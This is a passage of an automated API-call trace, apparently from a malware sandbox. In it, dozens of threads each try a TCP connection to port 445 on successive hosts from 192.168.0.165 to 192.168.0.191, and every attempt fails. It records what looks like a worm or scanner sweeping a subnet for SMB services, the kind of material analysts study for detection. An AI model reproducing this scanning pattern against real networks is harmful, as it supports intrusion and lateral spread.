(_ReturnCode=0x0) Thread: id = 960 os_tid = 0xc5c [0143.850] GetCurrentThreadId () returned 0xc5c [0143.850] GetCurrentThreadId () returned 0xc5c [0143.850] GetCurrentThreadId () returned 0xc5c [0143.850] _errno () returned 0x294b598 [0143.850] wcslen (_String="192.168.0.165") returned 0xd [0143.850] wcstombs (in: _Dest=0x29513d0, _Source="192.168.0.165", _MaxCount=0xe | out: _Dest="192.168.0.165") returned 0xd [0143.850] htons (hostshort=0x1bd) returned 0xbd01 [0143.850] inet_addr (cp="192.168.0.165") returned 0xa500a8c0 [0143.850] socket (af=2, type=1, protocol=0) returned 0xf28 [0143.850] connect (s=0xf28, name=0x19dffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.165"), namelen=16) returned -1 [0165.137] GetCurrentThreadId () returned 0xc5c [0165.137] GetCurrentThreadId () returned 0xc5c [0165.137] longjmp () [0165.137] GetCurrentThreadId () returned 0xc5c [0165.137] CloseHandle (hObject=0xf18) returned 1 [0165.137] GetCurrentThreadId () returned 0xc5c [0165.137] Sleep (dwMilliseconds=0x0) [0165.171] _endthreadex (_ReturnCode=0x0) Thread: id = 961 os_tid = 0xfc4 [0143.851] GetCurrentThreadId () returned 0xfc4 [0143.851] GetCurrentThreadId () returned 0xfc4 [0143.851] GetCurrentThreadId () returned 0xfc4 [0143.851] _errno () returned 0x294b9e8 [0143.852] wcslen (_String="192.168.0.166") returned 0xd [0143.852] wcstombs (in: _Dest=0x2959410, _Source="192.168.0.166", _MaxCount=0xe | out: _Dest="192.168.0.166") returned 0xd [0143.852] htons (hostshort=0x1bd) returned 0xbd01 [0143.852] inet_addr (cp="192.168.0.166") returned 0xa600a8c0 [0143.852] socket (af=2, type=1, protocol=0) returned 0xf3c [0143.852] connect (s=0xf3c, name=0x1a03fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.166"), namelen=16) returned -1 [0165.138] GetCurrentThreadId () returned 0xfc4 [0165.138] GetCurrentThreadId () returned 0xfc4 [0165.138] longjmp () [0165.138] GetCurrentThreadId () returned 0xfc4 [0165.138] CloseHandle (hObject=0xf2c) returned 1 [0165.138] GetCurrentThreadId () returned 0xfc4 [0165.138] Sleep (dwMilliseconds=0x0) [0165.171] _endthreadex (_ReturnCode=0x0) Thread: id = 962 os_tid = 0xc64 [0143.853] GetCurrentThreadId () returned 0xc64 [0143.853] GetCurrentThreadId () returned 0xc64 [0143.853] GetCurrentThreadId () returned 0xc64 [0143.853] _errno () returned 0x294bc10 [0143.853] wcslen (_String="192.168.0.167") returned 0xd [0143.853] wcstombs (in: _Dest=0x295a418, _Source="192.168.0.167", _MaxCount=0xe | out: _Dest="192.168.0.167") returned 0xd [0143.853] htons (hostshort=0x1bd) returned 0xbd01 [0143.853] inet_addr (cp="192.168.0.167") returned 0xa700a8c0 [0143.853] socket (af=2, type=1, protocol=0) returned 0xf50 [0143.853] connect (s=0xf50, name=0x1a27fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.167"), namelen=16) returned -1 [0165.138] GetCurrentThreadId () returned 0xc64 [0165.138] GetCurrentThreadId () returned 0xc64 [0165.138] longjmp () [0165.138] GetCurrentThreadId () returned 0xc64 [0165.138] CloseHandle (hObject=0xf40) returned 1 [0165.138] GetCurrentThreadId () returned 0xc64 [0165.138] Sleep (dwMilliseconds=0x0) [0165.172] _endthreadex (_ReturnCode=0x0) Thread: id = 963 os_tid = 0x9ec [0143.854] GetCurrentThreadId () returned 0x9ec [0143.854] GetCurrentThreadId () returned 0x9ec [0143.854] GetCurrentThreadId () returned 0x9ec [0143.854] _errno () returned 0x294be38 [0143.854] wcslen (_String="192.168.0.168") returned 0xd [0143.854] wcstombs (in: _Dest=0x29533e0, _Source="192.168.0.168", _MaxCount=0xe | out: _Dest="192.168.0.168") returned 0xd [0143.854] htons (hostshort=0x1bd) returned 0xbd01 [0143.855] inet_addr (cp="192.168.0.168") returned 0xa800a8c0 [0143.855] socket (af=2, type=1, protocol=0) returned 0xf64 [0143.855] connect (s=0xf64, name=0x1a4bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.168"), namelen=16) returned -1 [0165.138] GetCurrentThreadId () returned 0x9ec [0165.138] GetCurrentThreadId () returned 0x9ec [0165.138] longjmp () [0165.138] GetCurrentThreadId () returned 0x9ec [0165.138] CloseHandle (hObject=0xf54) returned 1 [0165.138] GetCurrentThreadId () returned 0x9ec [0165.138] Sleep (dwMilliseconds=0x0) [0165.172] _endthreadex (_ReturnCode=0x0) Thread: id = 964 os_tid = 0x8bc [0143.856] GetCurrentThreadId () returned 0x8bc [0143.856] GetCurrentThreadId () returned 0x8bc [0143.856] GetCurrentThreadId () returned 0x8bc [0143.856] _errno () returned 0x294c288 [0143.856] wcslen (_String="192.168.0.169") returned 0xd [0143.856] wcstombs (in: _Dest=0x2960448, _Source="192.168.0.169", _MaxCount=0xe | out: _Dest="192.168.0.169") returned 0xd [0143.856] htons (hostshort=0x1bd) returned 0xbd01 [0143.856] inet_addr (cp="192.168.0.169") returned 0xa900a8c0 [0143.856] socket (af=2, type=1, protocol=0) returned 0xf78 [0143.856] connect (s=0xf78, name=0x1a6ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.169"), namelen=16) returned -1 [0165.138] GetCurrentThreadId () returned 0x8bc [0165.138] GetCurrentThreadId () returned 0x8bc [0165.138] longjmp () [0165.138] GetCurrentThreadId () returned 0x8bc [0165.138] CloseHandle (hObject=0xf68) returned 1 [0165.138] GetCurrentThreadId () returned 0x8bc [0165.138] Sleep (dwMilliseconds=0x0) [0165.173] _endthreadex (_ReturnCode=0x0) Thread: id = 965 os_tid = 0xff8 [0143.858] GetCurrentThreadId () returned 0xff8 [0143.858] GetCurrentThreadId () returned 0xff8 [0143.858] GetCurrentThreadId () returned 0xff8 [0143.858] _errno () returned 0x294c4b0 [0143.858] wcslen (_String="192.168.0.170") returned 0xd [0143.858] wcstombs (in: _Dest=0x2961450, _Source="192.168.0.170", _MaxCount=0xe | out: _Dest="192.168.0.170") returned 0xd [0143.858] htons (hostshort=0x1bd) returned 0xbd01 [0143.858] inet_addr (cp="192.168.0.170") returned 0xaa00a8c0 [0143.858] socket (af=2, type=1, protocol=0) returned 0xf8c [0143.858] connect (s=0xf8c, name=0x1a93fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.170"), namelen=16) returned -1 [0165.139] GetCurrentThreadId () returned 0xff8 [0165.139] GetCurrentThreadId () returned 0xff8 [0165.139] longjmp () [0165.139] GetCurrentThreadId () returned 0xff8 [0165.139] CloseHandle (hObject=0xf7c) returned 1 [0165.139] GetCurrentThreadId () returned 0xff8 [0165.139] Sleep (dwMilliseconds=0x0) [0165.174] _endthreadex (_ReturnCode=0x0) Thread: id = 966 os_tid = 0xd04 [0143.859] GetCurrentThreadId () returned 0xd04 [0143.859] GetCurrentThreadId () returned 0xd04 [0143.859] GetCurrentThreadId () returned 0xd04 [0143.859] _errno () returned 0x294c6d8 [0143.859] wcslen (_String="192.168.0.171") returned 0xd [0143.859] wcstombs (in: _Dest=0x2962458, _Source="192.168.0.171", _MaxCount=0xe | out: _Dest="192.168.0.171") returned 0xd [0143.859] htons (hostshort=0x1bd) returned 0xbd01 [0143.859] inet_addr (cp="192.168.0.171") returned 0xab00a8c0 [0143.859] socket (af=2, type=1, protocol=0) returned 0xfa0 [0143.859] connect (s=0xfa0, name=0x1ab7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.171"), namelen=16) returned -1 [0165.139] GetCurrentThreadId () returned 0xd04 [0165.139] GetCurrentThreadId () returned 0xd04 [0165.139] longjmp () [0165.139] GetCurrentThreadId () returned 0xd04 [0165.139] CloseHandle (hObject=0xf90) returned 1 [0165.139] GetCurrentThreadId () returned 0xd04 [0165.139] Sleep (dwMilliseconds=0x0) [0165.174] _endthreadex (_ReturnCode=0x0) Thread: id = 967 os_tid = 0xd08 [0143.860] GetCurrentThreadId () returned 0xd08 [0143.861] GetCurrentThreadId () returned 0xd08 [0143.861] GetCurrentThreadId () returned 0xd08 [0143.861] _errno () returned 0x2926f58 [0143.861] wcslen (_String="192.168.0.172") returned 0xd [0143.861] wcstombs (in: _Dest=0x295b420, _Source="192.168.0.172", _MaxCount=0xe | out: _Dest="192.168.0.172") returned 0xd [0143.861] htons (hostshort=0x1bd) returned 0xbd01 [0143.861] inet_addr (cp="192.168.0.172") returned 0xac00a8c0 [0143.861] socket (af=2, type=1, protocol=0) returned 0xfb4 [0143.861] connect (s=0xfb4, name=0x1adbfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.172"), namelen=16) returned -1 [0165.139] GetCurrentThreadId () returned 0xd08 [0165.139] GetCurrentThreadId () returned 0xd08 [0165.139] longjmp () [0165.139] GetCurrentThreadId () returned 0xd08 [0165.139] CloseHandle (hObject=0xfa4) returned 1 [0165.139] GetCurrentThreadId () returned 0xd08 [0165.139] Sleep (dwMilliseconds=0x0) [0165.175] _endthreadex (_ReturnCode=0x0) Thread: id = 968 os_tid = 0xca0 [0143.863] GetCurrentThreadId () returned 0xca0 [0143.863] GetCurrentThreadId () returned 0xca0 [0143.863] GetCurrentThreadId () returned 0xca0 [0143.863] _errno () returned 0x2973f48 [0143.863] wcslen (_String="192.168.0.173") returned 0xd [0143.863] wcstombs (in: _Dest=0x2963460, _Source="192.168.0.173", _MaxCount=0xe | out: _Dest="192.168.0.173") returned 0xd [0143.863] htons (hostshort=0x1bd) returned 0xbd01 [0143.863] inet_addr (cp="192.168.0.173") returned 0xad00a8c0 [0143.863] socket (af=2, type=1, protocol=0) returned 0xfc8 [0143.863] connect (s=0xfc8, name=0x1afffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.173"), namelen=16) returned -1 [0165.139] GetCurrentThreadId () returned 0xca0 [0165.139] GetCurrentThreadId () returned 0xca0 [0165.139] longjmp () [0165.139] GetCurrentThreadId () returned 0xca0 [0165.139] CloseHandle (hObject=0xfb8) returned 1 [0165.139] GetCurrentThreadId () returned 0xca0 [0165.139] Sleep (dwMilliseconds=0x0) [0165.175] _endthreadex (_ReturnCode=0x0) Thread: id = 969 os_tid = 0xc68 [0143.865] GetCurrentThreadId () returned 0xc68 [0143.865] GetCurrentThreadId () returned 0xc68 [0143.865] GetCurrentThreadId () returned 0xc68 [0143.865] _errno () returned 0x2974170 [0143.865] wcslen (_String="192.168.0.174") returned 0xd [0143.865] wcstombs (in: _Dest=0x295c428, _Source="192.168.0.174", _MaxCount=0xe | out: _Dest="192.168.0.174") returned 0xd [0143.865] htons (hostshort=0x1bd) returned 0xbd01 [0143.865] inet_addr (cp="192.168.0.174") returned 0xae00a8c0 [0143.865] socket (af=2, type=1, protocol=0) returned 0xfdc [0143.865] connect (s=0xfdc, name=0x1b23fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.174"), namelen=16) returned -1 [0165.140] GetCurrentThreadId () returned 0xc68 [0165.140] GetCurrentThreadId () returned 0xc68 [0165.140] longjmp () [0165.140] GetCurrentThreadId () returned 0xc68 [0165.140] CloseHandle (hObject=0xfcc) returned 1 [0165.140] GetCurrentThreadId () returned 0xc68 [0165.140] Sleep (dwMilliseconds=0x0) [0165.176] _endthreadex (_ReturnCode=0x0) Thread: id = 970 os_tid = 0x1f4 [0143.867] GetCurrentThreadId () returned 0x1f4 [0143.867] GetCurrentThreadId () returned 0x1f4 [0143.867] GetCurrentThreadId () returned 0x1f4 [0143.867] _errno () returned 0x2974398 [0143.867] wcslen (_String="192.168.0.175") returned 0xd [0143.867] wcstombs (in: _Dest=0x2964468, _Source="192.168.0.175", _MaxCount=0xe | out: _Dest="192.168.0.175") returned 0xd [0143.867] htons (hostshort=0x1bd) returned 0xbd01 [0143.867] inet_addr (cp="192.168.0.175") returned 0xaf00a8c0 [0143.867] socket (af=2, type=1, protocol=0) returned 0xff0 [0143.867] connect (s=0xff0, name=0x1b47fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.175"), namelen=16) returned -1 [0165.140] GetCurrentThreadId () returned 0x1f4 [0165.140] GetCurrentThreadId () returned 0x1f4 [0165.140] longjmp () [0165.140] GetCurrentThreadId () returned 0x1f4 [0165.140] CloseHandle (hObject=0xfe0) returned 1 [0165.140] GetCurrentThreadId () returned 0x1f4 [0165.140] Sleep (dwMilliseconds=0x0) [0165.176] _endthreadex (_ReturnCode=0x0) Thread: id = 971 os_tid = 0xc78 [0143.868] GetCurrentThreadId () returned 0xc78 [0143.868] GetCurrentThreadId () returned 0xc78 [0143.868] GetCurrentThreadId () returned 0xc78 [0143.868] _errno () returned 0x29745c0 [0143.868] wcslen (_String="192.168.0.176") returned 0xd [0143.869] wcstombs (in: _Dest=0x295d430, _Source="192.168.0.176", _MaxCount=0xe | out: _Dest="192.168.0.176") returned 0xd [0143.869] htons (hostshort=0x1bd) returned 0xbd01 [0143.869] inet_addr (cp="192.168.0.176") returned 0xb000a8c0 [0143.869] socket (af=2, type=1, protocol=0) returned 0x1008 [0143.869] connect (s=0x1008, name=0x1b6bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.176"), namelen=16) returned -1 [0165.140] GetCurrentThreadId () returned 0xc78 [0165.140] GetCurrentThreadId () returned 0xc78 [0165.140] longjmp () [0165.140] GetCurrentThreadId () returned 0xc78 [0165.140] CloseHandle (hObject=0xff4) returned 1 [0165.140] GetCurrentThreadId () returned 0xc78 [0165.140] Sleep (dwMilliseconds=0x0) [0165.177] _endthreadex (_ReturnCode=0x0) Thread: id = 972 os_tid = 0xc20 [0143.870] GetCurrentThreadId () returned 0xc20 [0143.870] GetCurrentThreadId () returned 0xc20 [0143.870] GetCurrentThreadId () returned 0xc20 [0143.870] _errno () returned 0x2970960 [0143.870] wcslen (_String="192.168.0.177") returned 0xd [0143.870] wcstombs (in: _Dest=0x2965470, _Source="192.168.0.177", _MaxCount=0xe | out: _Dest="192.168.0.177") returned 0xd [0143.870] htons (hostshort=0x1bd) returned 0xbd01 [0143.870] inet_addr (cp="192.168.0.177") returned 0xb100a8c0 [0143.870] socket (af=2, type=1, protocol=0) returned 0x101c [0143.870] connect (s=0x101c, name=0x1b8ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.177"), namelen=16) returned -1 [0165.140] GetCurrentThreadId () returned 0xc20 [0165.140] GetCurrentThreadId () returned 0xc20 [0165.140] longjmp () [0165.140] GetCurrentThreadId () returned 0xc20 [0165.140] CloseHandle (hObject=0x100c) returned 1 [0165.140] GetCurrentThreadId () returned 0xc20 [0165.140] Sleep (dwMilliseconds=0x0) [0165.178] _endthreadex (_ReturnCode=0x0) Thread: id = 973 os_tid = 0xc58 [0143.871] GetCurrentThreadId () returned 0xc58 [0143.871] GetCurrentThreadId () returned 0xc58 [0143.871] GetCurrentThreadId () returned 0xc58 [0143.871] _errno () returned 0x2970b88 [0143.871] wcslen (_String="192.168.0.178") returned 0xd [0143.871] wcstombs (in: _Dest=0x295e438, _Source="192.168.0.178", _MaxCount=0xe | out: _Dest="192.168.0.178") returned 0xd [0143.871] htons (hostshort=0x1bd) returned 0xbd01 [0143.871] inet_addr (cp="192.168.0.178") returned 0xb200a8c0 [0143.871] socket (af=2, type=1, protocol=0) returned 0x1030 [0143.872] connect (s=0x1030, name=0x1bb3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.178"), namelen=16) returned -1 [0165.140] GetCurrentThreadId () returned 0xc58 [0165.141] GetCurrentThreadId () returned 0xc58 [0165.141] longjmp () [0165.141] GetCurrentThreadId () returned 0xc58 [0165.141] CloseHandle (hObject=0x1020) returned 1 [0165.141] GetCurrentThreadId () returned 0xc58 [0165.141] Sleep (dwMilliseconds=0x0) [0165.178] _endthreadex (_ReturnCode=0x0) Thread: id = 974 os_tid = 0xc38 [0143.873] GetCurrentThreadId () returned 0xc38 [0143.873] GetCurrentThreadId () returned 0xc38 [0143.873] GetCurrentThreadId () returned 0xc38 [0143.873] _errno () returned 0x2970db0 [0143.873] wcslen (_String="192.168.0.179") returned 0xd [0143.873] wcstombs (in: _Dest=0x2966478, _Source="192.168.0.179", _MaxCount=0xe | out: _Dest="192.168.0.179") returned 0xd [0143.873] htons (hostshort=0x1bd) returned 0xbd01 [0143.873] inet_addr (cp="192.168.0.179") returned 0xb300a8c0 [0143.873] socket (af=2, type=1, protocol=0) returned 0x1044 [0143.873] connect (s=0x1044, name=0x1bd7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.179"), namelen=16) returned -1 [0165.141] GetCurrentThreadId () returned 0xc38 [0165.141] GetCurrentThreadId () returned 0xc38 [0165.141] longjmp () [0165.141] GetCurrentThreadId () returned 0xc38 [0165.141] CloseHandle (hObject=0x1034) returned 1 [0165.141] GetCurrentThreadId () returned 0xc38 [0165.141] Sleep (dwMilliseconds=0x0) [0165.179] _endthreadex (_ReturnCode=0x0) Thread: id = 975 os_tid = 0xc24 [0143.874] GetCurrentThreadId () returned 0xc24 [0143.874] GetCurrentThreadId () returned 0xc24 [0143.874] GetCurrentThreadId () returned 0xc24 [0143.874] _errno () returned 0x2970fd8 [0143.874] wcslen (_String="192.168.0.180") returned 0xd [0143.874] wcstombs (in: _Dest=0x295f440, _Source="192.168.0.180", _MaxCount=0xe | out: _Dest="192.168.0.180") returned 0xd [0143.874] htons (hostshort=0x1bd) returned 0xbd01 [0143.874] inet_addr (cp="192.168.0.180") returned 0xb400a8c0 [0143.874] socket (af=2, type=1, protocol=0) returned 0x1058 [0143.875] connect (s=0x1058, name=0x1bfbfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.180"), namelen=16) returned -1 [0165.141] GetCurrentThreadId () returned 0xc24 [0165.141] GetCurrentThreadId () returned 0xc24 [0165.141] longjmp () [0165.141] GetCurrentThreadId () returned 0xc24 [0165.141] CloseHandle (hObject=0x1048) returned 1 [0165.141] GetCurrentThreadId () returned 0xc24 [0165.141] Sleep (dwMilliseconds=0x0) [0165.180] _endthreadex (_ReturnCode=0x0) Thread: id = 976 os_tid = 0xc1c [0143.876] GetCurrentThreadId () returned 0xc1c [0143.876] GetCurrentThreadId () returned 0xc1c [0143.876] GetCurrentThreadId () returned 0xc1c [0143.876] _errno () returned 0x2972e08 [0143.876] wcslen (_String="192.168.0.181") returned 0xd [0143.876] wcstombs (in: _Dest=0x296d4b0, _Source="192.168.0.181", _MaxCount=0xe | out: _Dest="192.168.0.181") returned 0xd [0143.876] htons (hostshort=0x1bd) returned 0xbd01 [0143.876] inet_addr (cp="192.168.0.181") returned 0xb500a8c0 [0143.876] socket (af=2, type=1, protocol=0) returned 0x106c [0143.876] connect (s=0x106c, name=0x1c1ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.181"), namelen=16) returned -1 [0165.141] GetCurrentThreadId () returned 0xc1c [0165.141] GetCurrentThreadId () returned 0xc1c [0165.141] longjmp () [0165.141] GetCurrentThreadId () returned 0xc1c [0165.141] CloseHandle (hObject=0x105c) returned 1 [0165.141] GetCurrentThreadId () returned 0xc1c [0165.141] Sleep (dwMilliseconds=0x0) [0165.180] _endthreadex (_ReturnCode=0x0) Thread: id = 977 os_tid = 0xc98 [0143.877] GetCurrentThreadId () returned 0xc98 [0143.877] GetCurrentThreadId () returned 0xc98 [0143.877] GetCurrentThreadId () returned 0xc98 [0143.878] _errno () returned 0x2971200 [0143.878] wcslen (_String="192.168.0.182") returned 0xd [0143.878] wcstombs (in: _Dest=0x296a498, _Source="192.168.0.182", _MaxCount=0xe | out: _Dest="192.168.0.182") returned 0xd [0143.878] htons (hostshort=0x1bd) returned 0xbd01 [0143.878] inet_addr (cp="192.168.0.182") returned 0xb600a8c0 [0143.878] socket (af=2, type=1, protocol=0) returned 0x1080 [0143.878] connect (s=0x1080, name=0x1c43fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.182"), namelen=16) returned -1 [0165.141] GetCurrentThreadId () returned 0xc98 [0165.141] GetCurrentThreadId () returned 0xc98 [0165.141] longjmp () [0165.141] GetCurrentThreadId () returned 0xc98 [0165.142] CloseHandle (hObject=0x1070) returned 1 [0165.142] GetCurrentThreadId () returned 0xc98 [0165.142] Sleep (dwMilliseconds=0x0) [0165.181] _endthreadex (_ReturnCode=0x0) Thread: id = 978 os_tid = 0xd8c [0143.879] GetCurrentThreadId () returned 0xd8c [0143.879] GetCurrentThreadId () returned 0xd8c [0143.879] GetCurrentThreadId () returned 0xd8c [0143.879] _errno () returned 0x2973258 [0143.879] wcslen (_String="192.168.0.183") returned 0xd [0143.879] wcstombs (in: _Dest=0x296e4b8, _Source="192.168.0.183", _MaxCount=0xe | out: _Dest="192.168.0.183") returned 0xd [0143.879] htons (hostshort=0x1bd) returned 0xbd01 [0143.879] inet_addr (cp="192.168.0.183") returned 0xb700a8c0 [0143.879] socket (af=2, type=1, protocol=0) returned 0x1094 [0143.879] connect (s=0x1094, name=0x1c67fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.183"), namelen=16) returned -1 [0165.142] GetCurrentThreadId () returned 0xd8c [0165.142] GetCurrentThreadId () returned 0xd8c [0165.142] longjmp () [0165.142] GetCurrentThreadId () returned 0xd8c [0165.142] CloseHandle (hObject=0x1084) returned 1 [0165.142] GetCurrentThreadId () returned 0xd8c [0165.142] Sleep (dwMilliseconds=0x0) [0165.181] _endthreadex (_ReturnCode=0x0) Thread: id = 979 os_tid = 0xe58 [0143.880] GetCurrentThreadId () returned 0xe58 [0143.880] GetCurrentThreadId () returned 0xe58 [0143.881] GetCurrentThreadId () returned 0xe58 [0143.881] _errno () returned 0x2973480 [0143.881] wcslen (_String="192.168.0.184") returned 0xd [0143.881] wcstombs (in: _Dest=0x296b4a0, _Source="192.168.0.184", _MaxCount=0xe | out: _Dest="192.168.0.184") returned 0xd [0143.881] htons (hostshort=0x1bd) returned 0xbd01 [0143.881] inet_addr (cp="192.168.0.184") returned 0xb800a8c0 [0143.881] socket (af=2, type=1, protocol=0) returned 0x10a8 [0143.881] connect (s=0x10a8, name=0x1c8bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.184"), namelen=16) returned -1 [0165.142] GetCurrentThreadId () returned 0xe58 [0165.142] GetCurrentThreadId () returned 0xe58 [0165.142] longjmp () [0165.142] GetCurrentThreadId () returned 0xe58 [0165.142] CloseHandle (hObject=0x1098) returned 1 [0165.142] GetCurrentThreadId () returned 0xe58 [0165.142] Sleep (dwMilliseconds=0x0) [0165.182] _endthreadex (_ReturnCode=0x0) Thread: id = 980 os_tid = 0xc44 [0143.882] GetCurrentThreadId () returned 0xc44 [0143.882] GetCurrentThreadId () returned 0xc44 [0143.882] GetCurrentThreadId () returned 0xc44 [0143.882] _errno () returned 0x2973030 [0143.882] wcslen (_String="192.168.0.185") returned 0xd [0143.882] wcstombs (in: _Dest=0x296c4a8, _Source="192.168.0.185", _MaxCount=0xe | out: _Dest="192.168.0.185") returned 0xd [0143.882] htons (hostshort=0x1bd) returned 0xbd01 [0143.882] inet_addr (cp="192.168.0.185") returned 0xb900a8c0 [0143.882] socket (af=2, type=1, protocol=0) returned 0x10bc [0143.884] connect (s=0x10bc, name=0x1caffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.185"), namelen=16) returned -1 [0165.142] GetCurrentThreadId () returned 0xc44 [0165.142] GetCurrentThreadId () returned 0xc44 [0165.142] longjmp () [0165.142] GetCurrentThreadId () returned 0xc44 [0165.142] CloseHandle (hObject=0x10ac) returned 1 [0165.142] GetCurrentThreadId () returned 0xc44 [0165.142] Sleep (dwMilliseconds=0x0) [0165.182] _endthreadex (_ReturnCode=0x0) Thread: id = 981 os_tid = 0x820 [0143.885] GetCurrentThreadId () returned 0x820 [0143.885] GetCurrentThreadId () returned 0x820 [0143.885] GetCurrentThreadId () returned 0x820 [0143.886] _errno () returned 0x29736a8 [0143.886] wcslen (_String="192.168.0.186") returned 0xd [0143.886] wcstombs (in: _Dest=0x2967480, _Source="192.168.0.186", _MaxCount=0xe | out: _Dest="192.168.0.186") returned 0xd [0143.886] htons (hostshort=0x1bd) returned 0xbd01 [0143.886] inet_addr (cp="192.168.0.186") returned 0xba00a8c0 [0143.886] socket (af=2, type=1, protocol=0) returned 0x10d0 [0143.886] connect (s=0x10d0, name=0x1cd3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.186"), namelen=16) returned -1 [0165.142] GetCurrentThreadId () returned 0x820 [0165.142] GetCurrentThreadId () returned 0x820 [0165.142] longjmp () [0165.142] GetCurrentThreadId () returned 0x820 [0165.142] CloseHandle (hObject=0x10c0) returned 1 [0165.143] GetCurrentThreadId () returned 0x820 [0165.143] Sleep (dwMilliseconds=0x0) [0165.183] _endthreadex (_ReturnCode=0x0) Thread: id = 982 os_tid = 0xc80 [0143.887] GetCurrentThreadId () returned 0xc80 [0143.887] GetCurrentThreadId () returned 0xc80 [0143.887] GetCurrentThreadId () returned 0xc80 [0143.887] _errno () returned 0x29738d0 [0143.887] wcslen (_String="192.168.0.187") returned 0xd [0143.887] wcstombs (in: _Dest=0x2968488, _Source="192.168.0.187", _MaxCount=0xe | out: _Dest="192.168.0.187") returned 0xd [0143.887] htons (hostshort=0x1bd) returned 0xbd01 [0143.887] inet_addr (cp="192.168.0.187") returned 0xbb00a8c0 [0143.887] socket (af=2, type=1, protocol=0) returned 0x10e4 [0143.887] connect (s=0x10e4, name=0x1cf7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.187"), namelen=16) returned -1 [0165.143] GetCurrentThreadId () returned 0xc80 [0165.143] GetCurrentThreadId () returned 0xc80 [0165.143] longjmp () [0165.143] GetCurrentThreadId () returned 0xc80 [0165.143] CloseHandle (hObject=0x10d4) returned 1 [0165.143] GetCurrentThreadId () returned 0xc80 [0165.143] Sleep (dwMilliseconds=0x0) [0165.184] _endthreadex (_ReturnCode=0x0) Thread: id = 983 os_tid = 0x390 [0143.889] GetCurrentThreadId () returned 0x390 [0143.889] GetCurrentThreadId () returned 0x390 [0143.889] GetCurrentThreadId () returned 0x390 [0143.889] _errno () returned 0x2973d20 [0143.889] wcslen (_String="192.168.0.188") returned 0xd [0143.889] wcstombs (in: _Dest=0x2969490, _Source="192.168.0.188", _MaxCount=0xe | out: _Dest="192.168.0.188") returned 0xd [0143.889] htons (hostshort=0x1bd) returned 0xbd01 [0143.889] inet_addr (cp="192.168.0.188") returned 0xbc00a8c0 [0143.889] socket (af=2, type=1, protocol=0) returned 0x10f8 [0143.889] connect (s=0x10f8, name=0x1d1bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.188"), namelen=16) returned -1 [0165.143] GetCurrentThreadId () returned 0x390 [0165.143] GetCurrentThreadId () returned 0x390 [0165.143] longjmp () [0165.143] GetCurrentThreadId () returned 0x390 [0165.143] CloseHandle (hObject=0x10e8) returned 1 [0165.143] GetCurrentThreadId () returned 0x390 [0165.143] Sleep (dwMilliseconds=0x0) [0165.184] _endthreadex (_ReturnCode=0x0) Thread: id = 984 os_tid = 0xc3c [0143.890] GetCurrentThreadId () returned 0xc3c [0143.890] GetCurrentThreadId () returned 0xc3c [0143.890] GetCurrentThreadId () returned 0xc3c [0143.890] _errno () returned 0x2973af8 [0143.893] wcslen (_String="192.168.0.189") returned 0xd [0143.893] wcstombs (in: _Dest=0x1d404090, _Source="192.168.0.189", _MaxCount=0xe | out: _Dest="192.168.0.189") returned 0xd [0143.893] htons (hostshort=0x1bd) returned 0xbd01 [0143.893] inet_addr (cp="192.168.0.189") returned 0xbd00a8c0 [0143.893] socket (af=2, type=1, protocol=0) returned 0x110c [0143.893] connect (s=0x110c, name=0x1d3ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.189"), namelen=16) returned -1 [0165.143] GetCurrentThreadId () returned 0xc3c [0165.143] GetCurrentThreadId () returned 0xc3c [0165.143] longjmp () [0165.143] GetCurrentThreadId () returned 0xc3c [0165.143] CloseHandle (hObject=0x10fc) returned 1 [0165.143] GetCurrentThreadId () returned 0xc3c [0165.143] Sleep (dwMilliseconds=0x0) [0165.185] _endthreadex (_ReturnCode=0x0) Thread: id = 985 os_tid = 0x9a4 [0143.894] GetCurrentThreadId () returned 0x9a4 [0143.894] GetCurrentThreadId () returned 0x9a4 [0143.894] GetCurrentThreadId () returned 0x9a4 [0143.894] _errno () returned 0x2971650 [0143.894] wcslen (_String="192.168.0.190") returned 0xd [0143.894] wcstombs (in: _Dest=0x1d402080, _Source="192.168.0.190", _MaxCount=0xe | out: _Dest="192.168.0.190") returned 0xd [0143.894] htons (hostshort=0x1bd) returned 0xbd01 [0143.895] inet_addr (cp="192.168.0.190") returned 0xbe00a8c0 [0143.895] socket (af=2, type=1, protocol=0) returned 0x1120 [0143.895] connect (s=0x1120, name=0x1d83fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.190"), namelen=16) returned -1 [0165.144] GetCurrentThreadId () returned 0x9a4 [0165.144] GetCurrentThreadId () returned 0x9a4 [0165.144] longjmp () [0165.144] GetCurrentThreadId () returned 0x9a4 [0165.144] CloseHandle (hObject=0x1110) returned 1 [0165.144] GetCurrentThreadId () returned 0x9a4 [0165.144] Sleep (dwMilliseconds=0x0) [0165.185] _endthreadex (_ReturnCode=0x0) Thread: id = 986 os_tid = 0xe54 [0143.896] GetCurrentThreadId () returned 0xe54 [0143.896] GetCurrentThreadId () returned 0xe54 [0143.896] GetCurrentThreadId () returned 0xe54 [0143.896] _errno () returned 0x2971878 [0143.896] wcslen (_String="192.168.0.191") returned 0xd [0143.896] wcstombs (in: _Dest=0x1d403088, _Source="192.168.0.191", _MaxCount=0xe | out: _Dest="192.168.0.191") returned 0xd 